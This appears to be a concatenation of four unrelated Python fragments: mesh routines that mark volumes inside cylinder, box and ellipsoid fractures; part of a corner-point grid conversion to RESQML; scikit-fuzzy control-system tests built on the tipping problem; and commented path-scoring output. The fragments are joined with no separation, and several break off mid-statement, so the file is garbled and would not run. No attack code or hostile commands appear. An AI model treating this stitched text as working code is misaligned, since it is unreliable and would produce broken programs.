Right end of the cylinder's axis.
Returns
------
None
"""
vertices = self.mesh.nodes.coords[:]
# Cylinder's vector parameters.
e = c2 - c1
m = np.cross(c1, c2)
# Calculating the distance between the vertices and the main axis.
d_vector = m + np.cross(e, vertices)
d = np.linalg.norm(d_vector, axis=1) / L
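# This uses the identity c1 x c2 + (c2 - c1) x P == (P - c1) x (P - c2); its norm divided by
# L = |c2 - c1| is the distance from each vertex P to the infinite line through c1 and c2.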
# Computing the projection of the vertices onto the cylinder's axis.
u = vertices - c1
proj_vertices = u.dot(e) / L
# Checking which vertices are inside the cylinder.
vertices_in_cylinder = self.mesh.nodes.all[(d <= R) & (
proj_vertices >= 0) & (proj_vertices <= L)]
if len(vertices_in_cylinder) > 0:
volumes_in_cylinder = self.mesh.nodes.bridge_adjacencies(vertices_in_cylinder,
"edges", "volumes").ravel()
if volumes_in_cylinder.dtype == "object":
volumes_in_cylinder = np.concatenate(volumes_in_cylinder)
volumes_in_cylinder = np.unique(volumes_in_cylinder)
volumes_vug_value = self.mesh.vug[volumes_in_cylinder].flatten()
non_vug_volumes = volumes_in_cylinder[volumes_vug_value == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_for_boxes(self, c1, c2, d, l, h):
"""
Check which volumes are inside the box shaped fracture.
Parameters
----------
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
Right end of the cylinder's axis.
d: float
Depth of box.
l: float
Length of box.
h: float
Height of box.
Returns
------
None
"""
# Box center.
center = (c1 + c2) / 2
# Defining an orientation vector so we can compute rotations.
u = np.array([d / 2, 0.0, 0.0])
v = c1 - center
R = rotation_to_align(u, v)
# Compute the rotated axis.
rotated_ax = np.array([1.0, 0.0, 0.0]).dot(R)
rotated_ay = np.array([0.0, 1.0, 0.0]).dot(R)
rotated_az = np.array([0.0, 0.0, 1.0]).dot(R)
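# A vertex lies inside the oriented box iff the absolute projections of its offset from the
# center onto the three rotated axes are at most d/2, l/2 and h/2, respectively (checked below).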
# Compute volumes inside the box (what's in the box!?).
vertices = self.mesh.nodes.coords[:]
X = vertices - center
vertices_in_x_range = np.abs(X.dot(rotated_ax)) <= (d / 2)
vertices_in_y_range = np.abs(X.dot(rotated_ay)) <= (l / 2)
vertices_in_z_range = np.abs(X.dot(rotated_az)) <= (h / 2)
vertices_handles = self.mesh.nodes.all[vertices_in_x_range & vertices_in_y_range & vertices_in_z_range]
if len(vertices_handles) > 0:
vols_in_fracture = np.concatenate(self.mesh.nodes.bridge_adjacencies(
vertices_handles, "edges", "volumes")).ravel()
unique_vols_in_fracture = np.unique(vols_in_fracture)
unique_volumes_vug_values = self.mesh.vug[unique_vols_in_fracture].flatten()
non_vug_volumes = unique_vols_in_fracture[unique_volumes_vug_values == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_for_ellipsoids(self, c1, c2, params):
"""
Check which volumes are inside the ellipsoid shaped fracture.
Parameters
----------
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
Right end of the cylinder's axis.
Returns
------
None
"""
# Ellipsoid's parameters
center = (c1 + c2) / 2
# Defining orientation vectors.
u = np.array([params[0], 0.0, 0.0])
v = c1 - center
R = rotation_to_align(u, v)
vertices = self.mesh.nodes.coords[:]
X = (vertices - center).dot(R.T)
vertices_in_ellipsoid = ((X / params)**2).sum(axis=1)
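# Standard ellipsoid test in the rotated frame: (x/a)^2 + (y/b)^2 + (z/c)^2 < 1 means the
# vertex lies strictly inside the ellipsoid with semi-axes params = (a, b, c).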
vertices_handles = self.mesh.nodes.all[vertices_in_ellipsoid < 1]
if len(vertices_handles) > 0:
vols_in_fracture = np.concatenate(self.mesh.nodes.bridge_adjacencies(
vertices_handles, "edges", "volumes")).ravel()
unique_vols_in_fracture = np.unique(vols_in_fracture)
unique_volumes_vug_values = self.mesh.vug[unique_vols_in_fracture].flatten()
non_vug_volumes = unique_vols_in_fracture[unique_volumes_vug_values == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_along_axis(self, c1, c2):
# Check for intersection between the box's axis and the mesh faces.
faces = self.mesh.faces.all[:]
num_faces = len(faces)
faces_nodes_handles = self.mesh.faces.connectivities[:]
num_vertices_of_volume = faces_nodes_handles.shape[1]
faces_vertices = self.mesh.nodes.coords[faces_nodes_handles.flatten()].reshape(
(num_faces, num_vertices_of_volume, 3))
# Plane parameters of each face.
R_0 = faces_vertices[:, 0, :]
N = np.cross(faces_vertices[:, 1, :] - R_0, faces_vertices[:, 2, :] - R_0)
# Compute the parameters of the main axis line.
num = np.einsum("ij,ij->i", N, R_0 - c1)
denom = N.dot(c2 - c1)
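# For the segment P(r) = c1 + r*(c2 - c1), the plane of each face is hit at
# r = N.(R_0 - c1) / N.(c2 - c1); faces whose planes are (nearly) parallel to the segment
# (|denom| ~ 0) are filtered out below, and only hits with 0 <= r <= 1 lie on the segment.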
non_zero_denom = denom[np.abs(denom) > 1e-6]
non_zero_num = num[np.abs(denom) > 1e-6]
r = non_zero_num / non_zero_denom
# Check faces intersected by the axis' line.
filtered_faces = faces[np.abs(denom) > 1e-6]
filtered_faces = filtered_faces[(r >= 0) & (r <= 1)]
filtered_nodes = faces_vertices[np.abs(denom) > 1e-6]
filtered_nodes = filtered_nodes[(r >= 0) & (r <= 1)]
r = r[(r >= 0) & (r <= 1)]
P = c1 + r[:, np.newaxis]*(c2 - c1)
# Compute the intersection point between the face plane and the axis
# line and check if such point is in the face.
angle_sum = np.zeros(filtered_nodes.shape[0])
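# Angle-sum point-in-polygon test: the angles subtended at P by consecutive face vertices sum
# to roughly 2*pi when P lies inside the (planar, convex) face and to a smaller value otherwise.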
for i in range(num_vertices_of_volume):
p0, p1 = filtered_nodes[:, i, :], filtered_nodes[:, (i+1) % num_vertices_of_volume, :]
a = p0 - P
b = p1 - P
norm_prod = np.linalg.norm(a, axis=1)*np.linalg.norm(b, axis=1)
# If the point of intersection is too close to a vertex, then
# take it as
geometry
if geometry_defined_everywhere:
full_mask = None
masked_cp_array = ma.masked_array(cp_array, mask = ma.nomask)
log.info('geometry present for all cells')
else:
full_mask = cp_nan_mask.reshape((nk, nj, ni, 1)).repeat(24, axis = 3).reshape((nk, nj, ni, 2, 2, 2, 3))
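# repeat factor 24 = 2 * 2 * 2 corner points per cell times 3 xyz components, matching the
# trailing (2, 2, 2, 3) axes of the reshaped mask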
masked_cp_array = ma.masked_array(cp_array, mask = full_mask)
log.info('number of cells without geometry: ' + str(np.count_nonzero(cp_nan_mask)))
# convert to resqml
k_gaps = None
k_gap_after_layer = None
k_gap_raw_index = None
if nk > 1:
# check for (vertical) voids, or un-pillar-like anomalies, which will require k gaps in the resqml ijk grid
log.debug('checking for voids')
gap = masked_cp_array[1:, :, :, 0, :, :, :] - masked_cp_array[:-1, :, :, 1, :, :, :]
max_gap_by_layer_and_xyz = np.max(np.abs(gap), axis = (1,2,3,4))
max_gap = np.max(max_gap_by_layer_and_xyz)
log.debug('maximum void distance: {0:.3f}'.format(max_gap))
if max_gap > max_z_void:
log.warning('maximum void distance exceeds limit, grid will include k gaps')
k_gaps = 0
k_gap_after_layer = np.zeros((nk - 1, ), dtype = bool)
k_gap_raw_index = np.empty((nk, ), dtype = int)
k_gap_raw_index[0] = 0
for k in range(nk - 1):
max_layer_gap = np.max(max_gap_by_layer_and_xyz[k])
if max_layer_gap > max_z_void:
k_gap_after_layer[k] = True
k_gaps += 1
elif max_layer_gap > 0.0:
# close void (includes shifting x & y)
log.debug('closing void below layer (0 based): ' + str(k))
layer_gap = gap[k] * 0.5
layer_gap_unmasked = np.where(gap[k].mask, 0.0, layer_gap)
masked_cp_array[k + 1, :, :, 0, :, :, :] -= layer_gap_unmasked
masked_cp_array[k, :, :, 1, :, :, :] += layer_gap_unmasked
k_gap_raw_index[k + 1] = k + k_gaps
elif max_gap > 0.0:
# close voids (includes shifting x & y)
log.debug('closing voids')
gap *= 0.5
gap_unmasked = np.where(gap.mask, 0.0, gap)
masked_cp_array[1:, :, :, 0, :, :, :] -= gap_unmasked
masked_cp_array[:-1, :, :, 1, :, :, :] += gap_unmasked
if k_gaps: nk_plus_1 += k_gaps
if k_gap_raw_index is None: k_gap_raw_index = np.arange(nk, dtype = int)
# reduce cp array extent in k
log.debug('reducing k extent of corner point array (sharing points vertically)')
k_reduced_cp_array = ma.masked_array(np.zeros((nk_plus_1, nj, ni, 2, 2, 3))) # (nk+1+k_gaps, nj, ni, jp, ip, xyz)
k_reduced_cp_array[0, :, :, :, :, :] = masked_cp_array[0, :, :, 0, :, :, :]
k_reduced_cp_array[-1, :, :, :, :, :] = masked_cp_array[-1, :, :, 1, :, :, :]
if k_gaps:
raw_k = 1
for k in range(nk - 1):
# fill reduced array slice(s) for base of layer k and top of layer k + 1
if k_gap_after_layer[k]:
k_reduced_cp_array[raw_k, :, :, :, :, :] = masked_cp_array[k, :, :, 1, :, :, :]
raw_k += 1
k_reduced_cp_array[raw_k, :, :, :, :, :] = masked_cp_array[k + 1, :, :, 0, :, :, :]
raw_k += 1
else: # take data from either possible cp slice, whichever is defined
slice = masked_cp_array[k + 1, :, :, 0, :, :, :]
k_reduced_cp_array[raw_k, :, :, :, :, :] = np.where(slice.mask, masked_cp_array[k, :, :, 1, :, :, :], slice)
raw_k += 1
assert raw_k == nk + k_gaps
else:
slice = masked_cp_array[1:, :, :, 0, :, :, :]
# where cell geometry undefined, if cell above is defined, take data from cell above with kp = 1 and set shared point defined
k_reduced_cp_array[1:-1, :, :, :, :, :] = np.where(slice.mask, masked_cp_array[:-1, :, :, 1, :, :, :], slice)
# create 2D array of active columns (columns where at least one cell is active)
log.debug('creating 2D array of active columns')
active_mask_2D = np.any(active_mask, axis = 0)
# create primary pillar reference indices as one of four column corners around pillar, active column preferred
log.debug('creating primary pillar reference neighbourly indices')
primary_pillar_jip = np.zeros((nj_plus_1, ni_plus_1, 2), dtype = 'int') # (nj + 1, ni + 1, jp:ip)
primary_pillar_jip[-1, :, 0] = 1
primary_pillar_jip[:, -1, 1] = 1
for j in range(nj_plus_1):
for i in range(ni_plus_1):
if active_mask_2D[j - primary_pillar_jip[j, i, 0], i - primary_pillar_jip[j, i, 1]]: continue
if i > 0 and primary_pillar_jip[j, i, 1] == 0 and active_mask_2D[j - primary_pillar_jip[j, i, 0], i - 1]:
primary_pillar_jip[j, i, 1] = 1
continue
if j > 0 and primary_pillar_jip[j, i, 0] == 0 and active_mask_2D[j - 1, i - primary_pillar_jip[j, i, 1]]:
primary_pillar_jip[j, i, 0] = 1
continue
if i > 0 and j > 0 and primary_pillar_jip[j, i, 0] == 0 and primary_pillar_jip[j, i, 1] == 0 and active_mask_2D[j - 1, i - 1]:
primary_pillar_jip[j, i, :] = 1
# build extra pillar references for split pillars
extras_count = np.zeros((nj_plus_1, ni_plus_1), dtype = 'int') # count (0 to 3) of extras for pillar
extras_list_index = np.zeros((nj_plus_1, ni_plus_1), dtype = 'int') # index in list of 1st extra for pillar
extras_list = [] # list of (jp, ip)
extras_use = np.negative(np.ones((nj, ni, 2, 2), dtype = 'int')) # (j, i, jp, ip); -1 means use primary
if split_pillars:
log.debug('building extra pillar references for split pillars')
# loop over pillars
for j in range(nj_plus_1):
for i in range(ni_plus_1):
primary_jp = primary_pillar_jip[j, i, 0]
primary_ip = primary_pillar_jip[j, i, 1]
p_col_j = j - primary_jp
p_col_i = i - primary_ip
# loop over 4 columns surrounding this pillar
for jp in range(2):
col_j = j - jp
if col_j < 0 or col_j >= nj: continue # no column this side of pillar in j
for ip in range(2):
col_i = i - ip
if col_i < 0 or col_i >= ni: continue # no column this side of pillar in i
if jp == primary_jp and ip == primary_ip: continue # this column is the primary for this pillar
discrepancy = np.max(np.abs(k_reduced_cp_array[:, col_j, col_i, jp, ip, :] -
k_reduced_cp_array[:, p_col_j, p_col_i, primary_jp, primary_ip, :]))
if discrepancy <= split_tolerance:
continue # data for this column's corner aligns with primary
for e in range(extras_count[j, i]):
eli = extras_list_index[j, i] + e
pillar_j_extra = j - extras_list[eli][0]
pillar_i_extra = i - extras_list[eli][1]
discrepancy = np.max(np.abs(k_reduced_cp_array[:, col_j, col_i, jp, ip, :] -
k_reduced_cp_array[:, pillar_j_extra, pillar_i_extra, extras_list[eli][0], extras_list[eli][1], :]))
if discrepancy <= split_tolerance: # data for this corner aligns with existing extra
extras_use[col_j, col_i, jp, ip] = e
break
if extras_use[col_j, col_i, jp, ip] >= 0: # reusing an existing extra for this pillar
continue
# add this corner as an extra
if extras_count[j, i] == 0: # create entry point for this pillar in extras
extras_list_index[j, i] = len(extras_list)
extras_list.append((jp, ip))
extras_use[col_j, col_i, jp, ip] = extras_count[j, i]
extras_count[j, i] += 1
if len(extras_list) == 0: split_pillars = False
log.debug('number of extra pillars: ' + str(len(extras_list)))
# create points array as used in resqml
log.debug('creating points array as used in resqml format')
if split_pillars:
points_array = np.zeros((nk_plus_1, (nj_plus_1 * ni_plus_1) + len(extras_list), 3)) # note: nk_plus_1 might include k_gaps
index = 0
# primary pillars
for pillar_j in range(nj_plus_1):
for pillar_i in range(ni_plus_1):
(jp, ip) = primary_pillar_jip[pillar_j, pillar_i]
slice = k_reduced_cp_array[:, pillar_j - jp, pillar_i - ip, jp, ip, :]
points_array[:, index, :] = np.where(slice.mask, np.nan, slice) # NaN indicates undefined/invalid geometry
index += 1
# add extras for split pillars
for pillar_j in range(nj_plus_1):
for pillar_i in range(ni_plus_1):
for e in range(extras_count[pillar_j, pillar_i]):
eli = extras_list_index[pillar_j, pillar_i] + e
(jp, ip) = extras_list[eli]
pillar_j_extra = pillar_j - jp
pillar_i_extra = pillar_i - ip
slice = k_reduced_cp_array[:, pillar_j_extra, pillar_i_extra, jp, ip, :]
points_array[:, index, :] = np.where(slice.mask, np.nan, slice) # NaN indicates undefined/invalid geometry
index += 1
assert(index == (nj_plus_1 * ni_plus_1) + len(extras_list))
else: # unsplit pillars
points_array = np.zeros((nk_plus_1, nj_plus_1, ni_plus_1, 3))
for j in range(nj_plus_1):
for i in range(ni_plus_1):
(jp, ip) = primary_pillar_jip[j, i]
slice = k_reduced_cp_array[:, j - jp, i - ip, jp, ip, :]
points_array[:, j, i, :] = np.where(slice.mask, np.nan, slice) # NaN indicates undefined/invalid geometry
# create an empty grid object and fill in some basic info
log.debug('initialising grid object')
grid = grr.Grid(model, extract_basics_from_xml = False)
grid.grid_representation = 'IjkGrid'
grid.extent_kji = np.array((nk, nj, ni), dtype = 'int')
grid.nk, grid.nj, grid.ni = nk, nj, ni
grid.k_direction_is_down = True # assumed direction for corp; todo: determine from geometry and crs z_inc_down flag
if known_to_be_straight:
grid.pillar_shape =
import networkx
import nose
import numpy as np
import numpy.testing as tst
import skfuzzy as fuzz
import skfuzzy.control as ctrl
from pytest import approx, raises
try:
from numpy.testing.decorators import skipif
except AttributeError:
from numpy.testing.dec import skipif
except ModuleNotFoundError:
from numpy.testing import dec
skipif = dec.skipif
from skfuzzy.control import EmptyMembershipError
def test_tipping_problem():
# The full tipping problem uses many of these methods
food = ctrl.Antecedent(np.linspace(0, 10, 11), 'quality')
service = ctrl.Antecedent(np.linspace(0, 10, 11), 'service')
tip = ctrl.Consequent(np.linspace(0, 25, 26), 'tip')
food.automf(3)
service.automf(3)
# Manual membership function definition
tip['bad'] = fuzz.trimf(tip.universe, [0, 0, 13])
tip['middling'] = fuzz.trimf(tip.universe, [0, 13, 25])
tip['lots'] = fuzz.trimf(tip.universe, [13, 25, 25])
# Define fuzzy rules
rule1 = ctrl.Rule(food['poor'] | service['poor'], tip['bad'])
rule2 = ctrl.Rule(service['average'], tip['middling'])
rule3 = ctrl.Rule(service['good'] | food['good'], tip['lots'])
# The control system - defined both possible ways
tipping = ctrl.ControlSystem([rule1, rule2, rule3])
tipping2 = ctrl.ControlSystem(rule1)
tipping2.addrule(rule2)
tipping2.addrule(rule3)
tip_sim = ctrl.ControlSystemSimulation(tipping)
tip_sim2 = ctrl.ControlSystemSimulation(tipping2)
# Inputs added both possible ways
inputs = {'quality': 6.5, 'service': 9.8}
for key, value in inputs.items():
tip_sim.input[key] = value
tip_sim2.inputs(inputs)
# Compute the system
tip_sim.compute()
tip_sim2.compute()
# Ensure both methods of defining rules yield the same results
for val0, val1 in zip(tip_sim.output.values(),
tip_sim2.output.values()):
tst.assert_allclose(val0, val1)
# Verify against manual computation
tst.assert_allclose(tip_sim.output['tip'], 19.8578, atol=1e-2, rtol=1e-2)
def setup_rule_order():
global a, b, c, d
a = ctrl.Antecedent(np.linspace(0, 10, 11), 'a')
b = ctrl.Antecedent(np.linspace(0, 10, 11), 'b')
c = ctrl.Antecedent(np.linspace(0, 10, 11), 'c')
d = ctrl.Antecedent(np.linspace(0, 10, 11), 'd')
for v in (a, b, c, d):
v.automf(3)
def test_bad_inputs():
# Start with the tipping problem
food = ctrl.Antecedent(np.linspace(0, 10, 11), 'quality')
service = ctrl.Antecedent(np.linspace(0, 10, 11), 'service')
tip = ctrl.Consequent(np.linspace(0, 25, 26), 'tip')
food.automf(3)
service.automf(3)
# Manual membership function definition
tip['bad'] = fuzz.trimf(tip.universe, [0, 0, 13])
tip['middling'] = fuzz.trimf(tip.universe, [0, 13, 25])
tip['lots'] = fuzz.trimf(tip.universe, [13, 25, 25])
# Define fuzzy rules
rule1 = ctrl.Rule(food['poor'] | service['poor'], tip['bad'])
rule2 = ctrl.Rule(service['average'], tip['middling'])
rule3 = ctrl.Rule(service['good'] | food['good'], tip['lots'])
# The control system - defined both possible ways
tipping = ctrl.ControlSystem([rule1, rule2, rule3])
tipping2 = ctrl.ControlSystem(rule1)
tipping2.addrule(rule2)
tipping2.addrule(rule3)
tip_sim = ctrl.ControlSystemSimulation(tipping, clip_to_bounds=False)
tip_sim2 = ctrl.ControlSystemSimulation(tipping2, clip_to_bounds=True)
# With clipping to bounds, these should work
tip_sim2.input['quality'] = -np.pi # below minimum, clipped to 0
tip_sim2.input['service'] = 15 # above maximum, clipped to 10
# Ensure the input checking is working properly when bounds aren't clipped
negative_pass = False
try:
tip_sim.input['quality'] = -np.pi # below minimum in universe
except IndexError:
negative_pass = True # It should raise this
else:
if not negative_pass:
raise ValueError('Input checking is not working correctly! '
'Minimum universe value is 0, but -3.14 did not '
'raise an IndexError.')
positive_pass = False
try:
tip_sim.input['quality'] = 15 # above maximum in universe
except IndexError:
positive_pass = True # It should raise this
else:
if not positive_pass:
raise ValueError('Input checking is not working correctly! '
'Maximum universe value is 10, but 15 did not '
'raise an IndexError.')
@skipif(float(networkx.__version__) >= 2.0)
@nose.with_setup(setup_rule_order)
def test_rule_order():
# Make sure rules are exposed in the order needed to solve them
# correctly
global a, b, c, d
r1 = ctrl.Rule(a['average'] | a['poor'], c['poor'], label='r1')
r2 = ctrl.Rule(c['poor'] | b['poor'], c['good'], label='r2')
r3 = ctrl.Rule(c['good'] | a['good'], d['good'], label='r3')
ctrl_sys = ctrl.ControlSystem([r1, r2, r3])
resolved = list(ctrl_sys.rules)
assert resolved == [r1, r2, r3], ("Order given was: {0}, expected {1}"
.format(resolved,
[r1.label, r2.label, r3.label]))
# The assert_raises decorator does not work in Python 2.6
@skipif(float(networkx.__version__) >= 2.0)
@nose.with_setup(setup_rule_order)
def test_unresolvable_rule_order():
# Make sure we don't get stuck in an infinite loop when the user
# gives an unresolvable rule order
global a, b, c, d
r1 = ctrl.Rule(a['average'] | a['poor'], c['poor'], label='r1')
r2 = ctrl.Rule(c['poor'] | b['poor'], c['poor'], label='r2')
r3 = ctrl.Rule(c['good'] | a['good'], d['good'], label='r3')
ex_msg = "Unable to resolve rule execution order"
with tst.assert_raises(RuntimeError, expected_regexp=ex_msg):
ctrl_sys = ctrl.ControlSystem([r1, r2, r3])
list(ctrl_sys.rules)
@nose.with_setup(setup_rule_order)
def test_bad_rules():
global a
not_rules = ['me', 192238, 42, dict()]
tst.assert_raises(ValueError, ctrl.ControlSystem, not_rules)
testsystem = ctrl.ControlSystem()
tst.assert_raises(ValueError, testsystem.addrule, a)
def test_lenient_simulation():
x1 = ctrl.Antecedent(np.linspace(0, 10, 11), "x1")
x1.automf(3) # term labels: poor, average, good
x2 = ctrl.Antecedent(np.linspace(0, 10, 11), "x2")
x2.automf(3)
y1 = ctrl.Consequent(np.linspace(0, 10, 11), "y1")
y1.automf(3)
y2 = ctrl.Consequent(np.linspace(0, 10, 11), "y2")
y2.automf(3)
r1 = ctrl.Rule(x1["poor"], y1["good"])
r2 = ctrl.Rule(x2["poor"], y2["good"])
sys = ctrl.ControlSystem([r1, r2])
sim = ctrl.ControlSystemSimulation(sys)
sim.input["x1"] = 0
sim.input["x2"] = 0
sim.compute()
assert set(sim.output.keys()) == {"y1", "y2"}
# print("- sim.output['y1']:", sim.output["y1"])
# print("- sim.output['y2']:", sim.output["y2"])
assert sim.output["y1"] == approx(8.333333)
assert sim.output["y2"] == approx(8.333333)
sim = ctrl.ControlSystemSimulation(sys, lenient=False)
sim.input["x1"] = 10
sim.input["x2"] = 0
with raises(EmptyMembershipError):
sim.compute()
sim = ctrl.ControlSystemSimulation(sys, lenient=True)
sim.input["x1"] = 10
sim.input["x2"] = 0
sim.compute()
assert set(sim.output.keys()) == {"y2"}
assert sim.output["y2"] == approx(8.333333)
def test_cached_lenient_simulation():
x1 = ctrl.Antecedent(np.linspace(0, 10, 11), "x1")
x1.automf(3) # term labels: poor, average, good
x2 = ctrl.Antecedent(np.linspace(0, 10, 11), "x2")
x2.automf(3)
y1 = ctrl.Consequent(np.linspace(0, 10, 11), "y1")
y1.automf(3)
y2 = ctrl.Consequent(np.linspace(0, 10, 11), "y2")
y2.automf(3)
r1 = ctrl.Rule(x1["poor"], y1["good"])
r2 = ctrl.Rule(x2["poor"], y2["good"])
sys = ctrl.ControlSystem([r1, r2])
sim = ctrl.ControlSystemSimulation(sys)
sim.input["x1"] = 10
sim.input["x2"] = 0
sim.compute()
# print("- sim.output.keys:", set(sim.output.keys()))
assert set(sim.output.keys()) == {"y2"}
sim.compute()
assert set(sim.output.keys()) == {"y2"}
def test_multiple_rules_same_consequent_term():
# 2 input variables, 1 output variable and 7 instances.
x1_inputs = [0.6, 0.2, 0.4, 0.7, 1, 1.2, 1.8]
x2_inputs = [0.9, 1, 0.8, 0, 1.2, 0.6, 1.8]
dom = np.arange(0, 2.1, 0.01)
x1 = ctrl.Antecedent(dom, "x1")
x1['label0'] = fuzz.trimf(x1.universe, (0.2, 0.2, 0.6))
x1['label1'] = fuzz.trimf(x1.universe, (0.2, 0.6, 1.0))
x1['label2'] = fuzz.trimf(x1.universe, (0.6, 1.0, 1.4))
x1['label3'] = fuzz.trimf(x1.universe, (1.0, 1.4, 1.8))
x1['label4'] = fuzz.trimf(x1.universe, (1.4, 1.8, 1.8))
x2 = ctrl.Antecedent(dom, "x2")
x2['label0'] = fuzz.trimf(x2.universe, (0.0, 0.0, 0.45))
x2['label1'] = fuzz.trimf(x2.universe, (0.0, 0.45, 0.9))
x2['label2'] = fuzz.trimf(x2.universe, (0.45, 0.9, 1.35))
x2['label3'] = fuzz.trimf(x2.universe, (0.9, 1.35, 1.8))
x2['label4'] = fuzz.trimf(x2.universe, (1.35, 1.8, 1.8))
y = ctrl.Consequent(dom, "y")
y['label0'] = fuzz.trimf(y.universe, (0.3, 0.3, 0.725))
y['label1'] = fuzz.trimf(y.universe, (0.3, 0.725, 1.15))
y['label2'] = fuzz.trimf(y.universe, (0.725, 1.15, 1.575))
y['label3'] = fuzz.trimf(y.universe, (1.15, 1.575, 2.0))
y['label4'] = fuzz.trimf(y.universe, (1.575, 2.0, 2.0))
r1 = ctrl.Rule(x1['label0'] & x2['label2'], y['label0'])
r2 = ctrl.Rule(x1['label1'] & x2['label0'], y['label0'])
r3 = ctrl.Rule(x1['label1'] & x2['label2'], y['label0'])
# Equivalent to above 3 rules
r123 = ctrl.Rule((x1['label0'] & x2['label2']) |
(x1['label1'] & x2['label0']) |
(x1['label1'] & x2['label2']), y['label0'])
r4 = ctrl.Rule(x1['label2'] & x2['label1'], y['label2'])
r5 = ctrl.Rule(x1['label2'] & x2['label3'], y['label3'])
r6 = ctrl.Rule(x1['label4'] & x2['label4'], y['label4'])
# Build a system with three rules targeting the same Consequent Term,
# and then an equivalent system with those three rules combined into one.
cs0 = ctrl.ControlSystem([r1, r2, r3, r4, r5, r6])
cs1 = ctrl.ControlSystem([r123, r4, r5, r6])
expected_results = [0.438372093023,
0.443962536855,
0.461436409933,
0.445290345769,
1.575,
1.15,
1.86162790698]
# Ensure the results are equivalent within error
for inst, expected in zip(range(7), expected_results):
sim0 = ctrl.ControlSystemSimulation(cs0)
sim1 = ctrl.ControlSystemSimulation(cs1)
sim0.input["x1"] = x1_inputs[inst]
sim0.input["x2"] = x2_inputs[inst]
sim1.input["x1"] = x1_inputs[inst]
sim1.input["x2"] = x2_inputs[inst]
sim0.compute()
sim1.compute()
tst.assert_allclose(sim0.output['y'], sim1.output['y'])
tst.assert_allclose(expected, sim0.output['y'], atol=1e-4, rtol=1e-4)
def test_complex_system():
# A much more complex system, run multiple times & with array inputs
universe = np.linspace(-2, 2, 5)
error = ctrl.Antecedent(universe, 'error')
delta = ctrl.Antecedent(universe, 'delta')
output = ctrl.Consequent(universe, 'output')
names = ['nb', 'ns', 'ze', 'ps', 'pb']
error.automf(names=names)
delta.automf(names=names)
output.automf(names=names)
# The rulebase:
# rule 1: IF e = ZE AND delta = ZE THEN output = ZE
# rule 2: IF e = ZE AND delta = SP THEN output = SN
# rule 3: IF e = SN AND delta = SN THEN output = LP
# rule 4: IF e = LP OR delta = LP THEN output = LN
rule0 = ctrl.Rule(antecedent=((error['nb'] & delta['nb']) |
(error['ns'] & delta['nb']) |
(error['nb'] & delta['ns'])),
consequent=output['nb'], label='rule nb')
rule1 = ctrl.Rule(antecedent=((error['nb'] & delta['ze']) |
(error['nb'] & delta['ps']) |
(error['ns'] & delta['ns']) |
(error['ns'] & delta['ze']) |
(error['ze'] & delta['ns']) |
(error['ze'] & delta['nb']) |
(error['ps'] & delta['nb'])),
consequent=output['ns'], label='rule ns')
rule2 = ctrl.Rule(antecedent=((error['nb'] & delta['pb']) |
(error['ns'] & delta['ps']) |
(error['ze'] & delta['ze']) |
(error['ps'] & delta['ns']) |
(error['pb'] & delta['nb'])),
consequent=output['ze'], label='rule ze')
rule3 = ctrl.Rule(antecedent=((error['ns'] & delta['pb']) |
(error['ze'] & delta['pb']) |
(error['ze'] & delta['ps']) |
(error['ps'] & delta['ps']) |
(error['ps'] & delta['ze']) |
(error['pb']
# A4 A5 A7 B4 F7
# Score 5 for path: ['E', 'E', 'S', 'S', 'S', 'E', 'N', 'E', 'S', 'S', 'S', 'W', 'W', 'W', 'N', 'N']
# A5 B2 B5 E3 F5
# Score 5 for path: ['S', 'W', 'W', 'W', 'N', 'E', 'N', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'E', 'N']
# D6 D7 F6 F7 I5
# checkExhaustivePathsWithAutoRepairPatterns(12, 8)
# Score 8 for path: ['E', 'S', 'S', 'S', 'S', 'W', 'S', 'E', 'E', 'S', 'W', 'W']
# A1 A2 A3 A4 C2 E3 E4 H1
# Score 8 for path: ['E', 'S', 'S', 'S', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# C2 C3 D2 E1 E2 E4 F1 I4
# Score 8 for path: ['W', 'W', 'N', 'N', 'E', 'E', 'N', 'W', 'N', 'N', 'E', 'N']
# C8 D10 E7 E10 F7 I10 J7 J8
# Score 8 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'N', 'N', 'E', 'N']
# D10 E7 E8 E10 F7 G9 I10 J7
# Score 8 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'N']
# D8 D10 E7 E8 F7 G9 I10 J7
# Score 8 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'N', 'E', 'E', 'N', 'N', 'N']
# D8 D10 E8 F7 F8 F10 I8 J10
# Score 9 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'N']
# D8 D10 E7 E8 F7 F10 I8 I10 J10
# Score 8 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'S', 'E']
# B2 B4 C2 D2 D4 E1 E2 G2
# Score 8 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S', 'S', 'S', 'E']
# D2 D4 E2 F4 G2 G4 I2 J2
# Score 8 for path: ['E', 'E', 'S', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'S', 'E']
# B2 B3 C2 D2 D4 E1 E2 G3
# Score 8 for path: ['N', 'N', 'N', 'E', 'N', 'N', 'N', 'E', 'S', 'E', 'S', 'S']
# A7 A8 C8 C9 C10 D7 D8 E10
# Score 9 for path: ['N', 'N', 'N', 'E', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'S']
# A8 A9 C8 C9 C10 D7 D8 F7 F9
# Score 9 for path: ['N', 'N', 'N', 'E', 'S', 'S', 'S', 'E', 'E', 'N', 'N', 'N']
# A5 A6 A7 A8 B10 C8 D5 F5 F6
# Score 10 for path: ['N', 'N', 'N', 'E', 'S', 'S', 'E', 'S', 'E', 'N', 'N', 'N']
# A6 A7 A8 B4 C8 C9 D5 D6 F6 F7
# Score 10 for path: ['N', 'N', 'N', 'E', 'S', 'E', 'S', 'S', 'E', 'N', 'N', 'N']
# A7 A8 B4 B5 C9 C10 D5 D6 F7 F8
# Score 8 for path: ['N', 'N', 'N', 'E', 'E', 'S', 'S', 'S', 'E', 'N', 'N', 'N']
# A8 B5 C10 D5 D6 F8 G4 G6
